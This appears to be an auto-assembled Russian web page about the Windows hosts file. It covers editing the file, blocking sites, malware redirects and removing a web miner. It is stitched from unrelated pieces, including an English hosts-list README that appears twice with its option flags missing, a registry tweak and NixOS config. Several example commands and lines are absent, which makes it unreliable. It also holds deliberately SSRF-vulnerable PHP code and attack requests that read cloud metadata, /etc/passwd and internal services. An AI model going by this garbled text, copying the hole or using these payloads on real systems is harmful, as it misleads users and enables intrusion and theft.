Вирус для файла hosts
Содержание:
Как изменить файл hosts в Windows 7, XP? В какой папке он находится?
Где находится системный файл hosts на компьютере с ОС Windows 7? Как его открыть и отредактировать?
Файл hosts — это обычный текстовый файл. В нем хранится база доменов и соответствующие им ip-адреса. Данный файл при необходимости изменяется вручную администратором компьютера и является аналогом DNS-серверов. Внесение изменений в этот файл производится, как правило, в случае временной некорректной работы DNS, а также для блокировки нежелательных сайтов путем указания для них локального ip-адреса компьютера.
В Windows 7, XP, Vista файл hosts можно найти по следующему адресу:C:\Windows\System32\drivers\etc\hosts
Искать файл «хостс» в данной папке лучше через обычный проводник Windows, так как через тот же файловый менеджер Total Commander его можно просто не найти — hosts уязвим для вредоносных программ и антивирусы ограничивают его использование ненадежным софтом.
Открыть файл hosts можно любым текстовым редактором. Возможно, понадобится вызвать правой кнопкой мыши контекстное меню для .exe-шника программы-редактора и выбрать в нем «Запуск от имени администратора».
БлокнотNotepad++
Файл hosts в программе Блокнот
Каждый сайт в интернете располагается на сервере, имеющем определенный ip-адрес. Для каждого доменного имени DNS-сервера хранят ip серверов сайтов, однако когда ip-адрес изменяется, у провайдеров вплоть до недели могут в кеше хранится старые адреса, в результате чего пользователь все это время, возможно, не сможет попасть на необходимый сайт. Для решения этой проблемы в файле hosts можно вручную прописать новый ip и через пробел адрес сайта.
Или наоборот, указать 127.0.0.1 и через пробел адрес нежелательного сайта. Таким образом с данного компьютера будет невозможно открыть заблокированный ресурс. Таким примитивным образом, например, ограничивают доступ к социальным сетям родители и работодатели. В тоже время таким способом злоумышленники могут перенаправлять пользователя на фишинговые сайты, поэтому если у вас не открывается какой-либо сайт или открывается, но странно выглядит, в первую очередь нужно проверить «хостс». Скачать оригинальный файл hosts для Windows можно на этой странице.
Инструкция по ручному удалению веб майнера HOST.BAT
Для того, чтобы самостоятельно избавиться от веб майнера HOST.BAT, вам необходимо последовательно выполнить все шаги, которые я привожу ниже:
- Открыть Диспетчер задач и выяснить, какой из процессов загружает все ресурсы вашего процессора. Это ваш браузер? Скорее всего, вы подверглись атаке веб майнера.
Проверьте плагины всех установленных браузеров Internet Explorer, Chrome, Firefox и т.д. Нпастоятельно рекомендую удалить их по максимуму, оставив только стандартные. Особенно это относится к браузеру Chrome.
Отключите использование скриптов, либо воспользуйтесь проверенным плагином для управления их запуском. Например, я использую NoScript для браузера FireFox.
Очистите временные файлы, кэш браузеров.
Что такое и почему возникает ошибка «Разрешение хоста»
Когда мы запрашиваем веб-страницу, наш браузер использует DNS серверы для разрешения домена, который мы поместили в адресную строку. Этот DNS-сервер будет использовать распределенную и иерархическую базу данных, в которой будет храниться информация, связанная с этими доменными именами в Интернете. Короче говоря, эти серверы переводят это доменное имя и превращают его в IP-адрес, чтобы мы могли получить доступ к этому ресурсу. Этот процесс выполняется потому, что легче запомнить имя, чем набор чисел. Например, если мы поместим IP 216.58.210.163 в адресную строку, это будет эквивалентно помещению www.google.es
Однако при загрузке веб-сайта сначала может показаться, что он запускается плавно, но у вас может быть, например, что-то вроде рекламного баннера, указывающего на неправильный или неработающий домен. В этом случае, поскольку DNS-сервер не может разрешить домен, наш браузер возвращает сообщение об ошибке » Разрешение принимающей стороны ”И остается заблокированным без возможности загрузки остальных элементов.
Короче говоря, когда этот процесс загрузки занимает больше времени, чем следует, возникает эта ошибка. Также следует отметить, что браузеры, сама Windows и некоторые программы кэшируют записи DNS, чтобы ускорить фазу поиска соединения. Это нормально, но при внесении изменений мы столкнемся с такими ошибками, как ошибка «Разрешение хоста».
Однако это можно легко решить, выполнив серию процедур, которые решат эти проблемы, вызванные падением хостов, и, наконец, после их выполнения они позволят нам без проблем загрузить остальные веб-элементы.
Generate your own unified hosts file
You have two options to generate your own hosts file. You can do it in your own environment, or within a Docker container. We’ll cover Docker first because it’s a short section.
Option 1: Generate in a Docker container
We provide a Dockerfile that you can use to create a Docker container with everything you need.
The container will contain Python 3 and all its dependency requirements, and a copy of the latest version of this repository.
Build the Docker container like this:
docker build ./
Access the terminal like this:
docker run -it (containerid) bash
Option 2: Generate it in your own environment
To generate your own amalgamated hosts files you will need Python 3.5 or later.
First, install the dependencies with:
pip3 install --user -r requirements.txt
Common steps regardless of your development environment
To run unit tests, in the top-level directory, run:
python3 testUpdateHostsFile.py
The script will generate a unified hosts file based on the sources in the
local subfolder. The script will prompt you whether it should fetch updated versions
(from locations defined by the text file in each source’s folder). Otherwise, it
will use the file that’s already there.
python3 updateHostsFile.py
Command line options
, or : display help.
, or : run the script without prompting. When is invoked,
- Hosts data sources, including extensions, are updated.
- No extensions are included by default. Use the or flag
to include any you want. - Your active hosts file is not replaced unless you include the
flag.
, or : Make a backup of existing hosts file(s) as you generate
over them.
, or : the names
of subfolders below the folder containing additional
category-specific hosts files to include in the amalgamation. Example:
or .
, or : skip the prompt for flushing the DNS cache.
Only active when is also active.
, or : the IP address to use as the
target. Default is .
, or : (default) or , keep the comments
that appear on the same line as domains. The default is .
, or : skip fetching updates from hosts data sources.
, or : place the generated source file
in a subfolder. If the subfolder does not exist, it will be created.
, or : trigger replacing your active hosts
, or : (default) or , omit the standard
section at the top, containing lines like . This is
useful for configuring proximate DNS services on the local network.
, or : (default) or , skip the generation of the
readmeData.json file used for generating readme.md files. This is useful if you are
generating host files with additional whitelists or blacklists and want to keep your
local checkout of this repo unmodified.
, or : (default) or , Compress the hosts file
ignoring non-necessary lines (empty lines and comments) and putting multiple
domains in each line. Reducing the number of lines of the hosts file improves
the performances under Windows (with DNS Client service enabled).
, or : (default) or , like , but puts
each domain on a separate line. This is necessary because many implementations
of URL blockers that rely on files do not conform to the standard which
allows multiple hosts on a single line.
, or : Append the given blacklist file
in hosts format to the generated hosts file.
, or : Use the given whitelist file
to remove hosts from the generated hosts file.
Работа с блокировкой сайтов через файл hosts
Так как файл хостс является посредником между сайтами и браузерами, то в нем можно прописать правила для доступа к конкретному сайту. К примеру через него можно без проблем заблокировать доступ к одноклассникам или контакту добавив всего две строчки в файл hosts.
127.0.0.1 ok.ru
127.0.0.1 vk.com
Конечно желательно прописать все возможные варианты ввода сайта, то есть с www и без www.
Таким образом если ваш ребенок сутками сидит за компьютером в любой из социальных сетей, вы можете без проблем заблокировать ему доступ к сайту, пока он не сделает все уроки к примеру. Чтобы заблокировать доступ к любому сайту достаточно добавить в новую строчку ip адрес локальной машины, он по умолчанию 127.0.0.1 и следом дописать домен сайта, то есть его название. Пример:
127.0.0.1 сайт-блокировки.ru
127.0.0.1 www.сайт-блокировки.ru
В первой строке вы блокируете обычное название сайта, а потом дублируете с префиксом www .
Наиболее продвинутые ребята создают ридиректы с помощью файла hosts, где ридеректы это автоматическое перенаправления пользователя с одного адреса на другой. К примеру можно сделать так, чтобы при попытке войти на сайт в контакте пользователь всегда попадал на сайт одноклассников.
То есть возможен такой исход ситуации, пользователь пытается войти на свою страничку в социальной сети, а попадает на какой-то вредоносный сайт, который вымогает из него деньги или показывает принудительную рекламу. Такие перенаправления делаются очень просто, снова начинаем запись с новой строки, сначала пишем ip адрес сайта куда нужно отправить пользователя, а потом пишем с какого сайта перенаправлять.
Пример строчки перенаправления с контакта на одноклассники:
Как видите, чтобы перенаправить с одного сайта на другой не нужны особые знания, надо лишь научиться определять ip адреса сайтов . А для этого существуют специальный сервисы, сайты на которых вы просто вводите название сайта, а вам в ответ показывают ip адрес сайта.
Для этого я на данный момент использую сервис: 2ip.ru/lookup смотрите как это просто на картинке:
Теперь вы знаете, что можно без проблем блокировать сайты через файл hosts
Для общего закрепления знаний рекомендую посмотреть видео ниже и все станет еще понятнее, а мои практические примеры научат вас делать необходимые настройки без проблем.
Пример
Рассмотрим приложение, код которого расположен ниже.
<?php
/**
* Check if the 'url' GET variable is set
* Example - http://localhost/?url=http://testphp.vulnweb.com/images/logo.gif
*/
if (isset($_GET)){
$url = $_GET;
/**
* Send a request vulnerable to SSRF since
* no validation is being done on $url
* before sending the request
*/
$image = fopen($url, 'rb');
/**
* Send the correct response headers
*/
header("Content-Type: image/png");
/**
* Dump the contents of the image
*/
fpassthru($image);}
Злоумышленник имеет полный контроль над параметром URL, он может делать произвольные запросы к любому веб-сайту и к ресурсам на сервере.
Рассмотрим несколько примеров запросов.
Запрос к Apache HTTP Servers жертвы.
GET /?url=http://localhost/server-status HTTP/1.1 Host: example.com
Атакующий может получить доступ к внутренним сервисам, например матаданным экземпляра облачной службы.
GET /?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1 Host: example.com
Кроме того атакующий может обратиться к нестандартной схеме.
GET /?url=file:///etc/passwd HTTP/1.1 Host: example.com
При использовании приложением curl, то атакующий может использовать схему URL dict: // для отправки запросов любому хосту на любом порту и отправки пользовательских данных.
GET /?url=dict://localhost:11211/stat HTTP/1.1 Host: example.com
Дополнительные меры
Не лишним будет проверить ПК на опасные вирусы и рекламный/шпионский хлам. Всего я выделил три лучшие утилиты для этого дела. А также помните, что вручную файл можно проверить на VirusTotal и Kaspersky VirusDesk.
- Dr.Web CureIt! — мощная утилита против опасных вирусов типа троянов, майнеров, ботнетов. Скачивается уже с антивирусными базами, поэтому весить может около 100 мегов. Длительность проверки зависит от количества файлов на диске, по окончании требуется перезагрузка.
- AdwCleaner — также мощная утилита, но уже против рекламных вирусов, шпионского ПО и подобного. Проверяет автозагрузку, реестр, планировщик задач, ярлыки и расширения браузеров. Эффективно удаляет рекламу с компьютера. Перед проверкой качает антивирусные базы, работает шустро.
- HitmanPro — можно сказать коллега AdwCleaner, но использует немного иной алгоритм работы, более тщательный, например может найти угрозу даже в куки-файлах. Работает шустро, прога платная, но есть бесплатный вариант проверки (я там вроде даже указывал несуществующую почту).
Именно проверка всеми тремя даст максимальную эффект.
Назначение и методы использования hosts
Файл hosts присутствует во всех современных версиях операционных систем Windows, располагается в одном и том же месте и сейчас везде выполняет одинаковую опцию. Однако раньше он заменял собой технологию DNS-сервера, то есть сопоставлял доменные имена с их IP-адресами. В нем указывался сам адрес, например, 192.154.12.1, и ему присваивалось доменное имя, например, site.com. Теперь юзер мог вводить доменное имя вместо полного IP-адреса, чтобы перейти на веб-ресурс через браузер. Это позволило более быстро запоминать расположение конкретных страниц, а также добавило креатива и маркетинга, ведь сейчас адрес сайта подбирают таким образом, чтобы он соответствовал не только тематике, но и запоминался.
hosts
- Базовый способ заключается в редактировании с целью блокировки доступа к определенным ресурсам. Делается это указанием ложного IP-адреса для конкретного доменного имени, о чем более детально мы поговорим позже. Системный администратор без каких-либо проблем может закрыть доступ к любому ресурсу, лишь введя его домен и присвоив несуществующий IP, на который и будет происходить перенаправление, соответственно, безуспешное.
- Такая же методика применяется и для блокировки вредоносных, а также рекламных сайтов, которые в перспективе могут нанести вред компьютеру. В разделе, посвященному редактированию самого hosts, мы затронем эту тему, представив один из самых актуальных список, подходящих для импорта.
- Реже опытные пользователи, обладающие локальными ресурсами, присваивают ему оптимальное доменное имя, чтобы каждый раз вручную не вводить цифры в браузере. Однако эта тема относится только к знающим юзерам, которые и так прекрасно понимают предназначение hosts.
- Последняя цель редактирования — ускорение загрузки веб-страниц. Если автоматически подобранный DNS-сервер по каким-то причинам не может обеспечить быстрый переход на конкретные ресурсы, вы можете сопоставить их IP и домены в данном файле, чтобы использовать именно его при переходе в браузере.
Отметим, что иногда разработчики вредоносного ПО при заражении компьютера совершают теневое редактирование объекта, внося туда правки по переадресации. Так, если компьютер заражен вирусом или рекламой, при открытии браузера вы можете автоматически попадать на какой-то неизвестный сайт. Если такая ситуация возникла, в первую очередь проверьте сам файл, удалив ненужные и подозрительные строки, а затем переходите к другим методам решения проблемы.
Подробнее: Борьба с рекламными вирусами
На будущее также рекомендуем проверить атрибут «Только чтение», чтобы заблокировать возможность повторного возникновения подобных случаев внезапного изменения объекта. Этой теме будет посвящен один из следующих разделов этой статьи.
Generate your own unified hosts file
You have two options to generate your own hosts file. You can do it in your own environment, or within a Docker container. We’ll cover Docker first because it’s a short section.
Option 1: Generate in a Docker container
We provide a Dockerfile that you can use to create a Docker container with everything you need.
The container will contain Python 3 and all its dependency requirements, and a copy of the latest version of this repository.
Build the Docker container like this:
docker build ./
Access the terminal like this:
docker run -it (containerid) bash
Option 2: Generate it in your own environment
To generate your own amalgamated hosts files you will need Python 3.5 or later.
First, install the dependencies with:
pip3 install --user -r requirements.txt
Common steps regardless of your development environment
To run unit tests, in the top-level directory, run:
python3 testUpdateHostsFile.py
The script will generate a unified hosts file based on the sources in the
local subfolder. The script will prompt you whether it should fetch updated versions
(from locations defined by the text file in each source’s folder). Otherwise, it
will use the file that’s already there.
python3 updateHostsFile.py
Command line options
, or : display help.
, or : run the script without prompting. When is invoked,
- Hosts data sources, including extensions, are updated.
- No extensions are included by default. Use the or flag
to include any you want. - Your active hosts file is not replaced unless you include the
flag.
, or : Make a backup of existing hosts file(s) as you generate
over them.
, or : the names
of subfolders below the folder containing additional
category-specific hosts files to include in the amalgamation. Example:
or .
, or : skip the prompt for flushing the DNS cache.
Only active when is also active.
, or : the IP address to use as the
target. Default is .
, or : (default) or , keep the comments
that appear on the same line as domains. The default is .
, or : skip fetching updates from hosts data sources.
, or : place the generated source file
in a subfolder. If the subfolder does not exist, it will be created.
, or : trigger replacing your active hosts
, or : (default) or , omit the standard
section at the top, containing lines like . This is
useful for configuring proximate DNS services on the local network.
, or : (default) or , skip the generation of the
readmeData.json file used for generating readme.md files. This is useful if you are
generating host files with additional whitelists or blacklists and want to keep your
local checkout of this repo unmodified.
, or : (default) or , Compress the hosts file
ignoring non-necessary lines (empty lines and comments) and putting multiple
domains in each line. Reducing the number of lines of the hosts file improves
the performances under Windows (with DNS Client service enabled).
, or : (default) or , like , but puts
each domain on a separate line. This is necessary because many implementations
of URL blockers that rely on files do not conform to the standard which
allows multiple hosts on a single line.
, or : Append the given blacklist file
in hosts format to the generated hosts file.
, or : Use the given whitelist file
to remove hosts from the generated hosts file.
Что такое Hosts и зачем он нужен?
Файл hosts — это текстовый документ, у которого нет расширения, однако открыть его можно через блокнот. В нем содержатся все доменные имена и адреса, к которым необходимо разрешить доступ или, например, запретить, перенаправить на другой IP-адрес.
При осуществлении серфинга в интернете, ваш браузер сначала обращается к так называемым DNS-серверам сайта, которые и отвечают ему, где расположены данные этого ресурса, после чего происходит автоматическая переадресация. Однако не всегда этот путь идет по прямой. Вот здесь как раз таки в роли проводника и выступает файл hosts. Если в нем прописаны какие-либо правила переадресации или запрета, то ваш браузер берет информацию из него и заходит именно на тот IP-адрес или ресурс, который в нем прописан.
Случались ли у вас ситуации, когда вы не могли зайти на сайт одноклассников, Вконтакте, Сбербанка? А после сброса всех настроек чудесным образом все работало, не так ли? Дело в том, что как раз таки в этом файле и были прописаны правила, которые блокировали к нему доступ или переадресовывали на сторонний ресурс.
Многие пользователи вносят коррективы в hosts, чтобы заблокировать навязчивую рекламу в своем смартфоне. Да, по умолчанию такой опции нет, но во многих случаях можно попытаться внести некоторые изменения, чтобы полностью или частично от нее избавиться, особенно, если она появляется в приложениях внезапно и постоянно.
Как открыть файл hosts.txt Windows
Все поправки файла hosts нужно совершать обдуманно, ведь пользователь ПК не сможет посетить веб-сайт, адрес которого прописан в hosts. Редактирование hosts можно провести в текстовом редакторе, например, в блокноте или в программе Notepad++, для этого необходимо открыть файл hosts в одном из текстовых редакторов.
Первый способ открытия файла hosts.txt:
- Правой кнопкой мыши кликаем по файлу
- Выберите пункт “Открыть с помощью”
- В появившемся окне выберите “Блокнот”
- Убирите галочку с пункта “Использовать выбранную программу для всех файлов такого типа”
- “ОК”
Как открыть файл hosts.txt от имени администратора:
- На рабочем столе или в любой папке нужно создать новый текстовый документ и открыть его от имени администратора
- Выбрать меню “Файл”
- Нажать пункт “Открыть”
- Перейти по пути нахождения файла hosts, выбрать его. Если по указанному пути не нашлось нужного файла, убедитесь, что в поле “Тип файла” указано значение “Все файлы” из выпадающего списка
- Нажать кнопку “Открыть”
Открыть hosts можно, используя командную строку:
- Нажать “Пуск”
- Найти “Стандартные”
- Тапнуть правой клавишей мышки по пункту “Командная строка”
- Выбираем пункт “Запуск от имени администратора”
При использовании Windows 7, введите в командную строку код:
Для Windows 8, 10 измените путь расположения файла hosts и вставьте в командную строку.
Sources of hosts data unified in this variant
Updated files from the following locations are always unified and
included:
| Host file source | Description | Home page | Raw hosts | Update frequency | License | Issues |
|---|---|---|---|---|---|---|
| Steven Black’s ad-hoc list | Additional sketch domains as I come across them. | link | occasionally | MIT | issues | |
| AdAway | AdAway is an open source ad blocker for Android using the hosts file. | frequently | CC BY 3.0 | issues | ||
| add.2o7Net | link | occasionally | MIT | issues | ||
| add.Dead | link | occasionally | MIT | issues | ||
| add.Risk | link | occasionally | MIT | issues | ||
| add.Spam | link | occasionally | MIT | issues | ||
| AdguardTeam cname trackers | CNAME-cloaked tracking abuses. | link | occasionally | MIT | issues | |
| Mitchell Krog’s — Badd Boyz Hosts | Sketchy domains and Bad Referrers from my Nginx and Apache Bad Bot and Spam Referrer Blockers | link | weekly | MIT | issues | |
| hostsVN | Hosts block ads of Vietnamese | link | occasionally | MIT | issues | |
| KADhosts | Fraud/adware/scam websites. | frequently | CC BY-SA 4.0 | issues | ||
| MetaMask eth-phishing-detect | Phishing domains targeting Ethereum users. | link | frequent | DON’T BE A DICK PUBLIC LICENSE | issues | |
| minecraft-hosts | Minecraft related tracker hosts | link | occasionally | CC0-1.0 | issues | |
| MVPS hosts file | The purpose of this site is to provide the user with a high quality custom HOSTS file. | monthly | CC BY-NC-SA 4.0 | issues | ||
| osint.digitalside.it | DigitalSide Threat-Intel malware domains list. | link | daily | MIT | issues | |
| shady-hosts | Analytics, ad, and activity monitoring hosts | link | occasionally | CC0-1.0 | issues | |
| How to make the internet not suck (as much). | frequently | non-commercial with attribution | issues | |||
| Tiuxo hostlist — ads | Categorized hosts files for DNS based content blocking | link | occasional | CC BY 4.0 | issues | |
| UncheckyAds | link | occasionally | MIT | issues | ||
| URLHaus | weekly | CC0 | issues | |||
| yoyo.org | Blocking with ad server and tracking server hostnames. | frequently | issues |
Уменьшение времени ожидания закрытия приложений
Воспользовавшись несложным твиком реестра, вы можете уменьшить время ожидания остановки служб и завершения работы приложений при выключении/перезагрузке компьютера. Таким образом вы сократите время, в течение которого на экране будет отображаться сообщение процесса THW. Запустите командой regedit редактор реестра и разверните в правой колонке ветку HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control. Справа найдите строковый параметр WaitToKillServiceTimeout и измените его значение на меньшее, например, 2000 или 1000 миллисекунд.
Далее разверните ветку HKEY_CURRENT_USER/Control Panel/Desktop. В правой колонке создайте новый строковый параметр с именем WaitToKillServiceTimeout и установите в качестве его значения то же число, что и для одноименного параметра в разделе HKEY_LOCAL_MACHINE.
Сохраните настройки, перезагрузитесь и проверьте, не исчезла ли проблема с THW.
NixOS
To install hosts file on your machine add the following into your :
{
networking.extraHosts = let
hostsPath = https://raw.githubusercontent.com/StevenBlack/hosts/master/hosts;
hostsFile = builtins.fetchurl hostsPath;
in builtins.readFile "${hostsFile}";
}
- NOTE: Change if you need other versions of hosts file.
- NOTE: The call to is impure.
Use with the exact commit if you want to always get the same result.
Nix Flake
NixOS installations which are managed through flakes can use the hosts file like this:
{
inputs.hosts.url = github:StevenBlack/hosts;
outputs = { self, nixpkgs, hosts }: {
nixosConfigurations.my-hostname = {
system = "<architecture>";
modules = ;
};
};
}
The hosts extensions are also available with the following options:
{
networking.stevenBlackHosts = {
blockFakenews = true;
blockGambling = true;
blockPorn = true;
blockSocial = true;
};
}
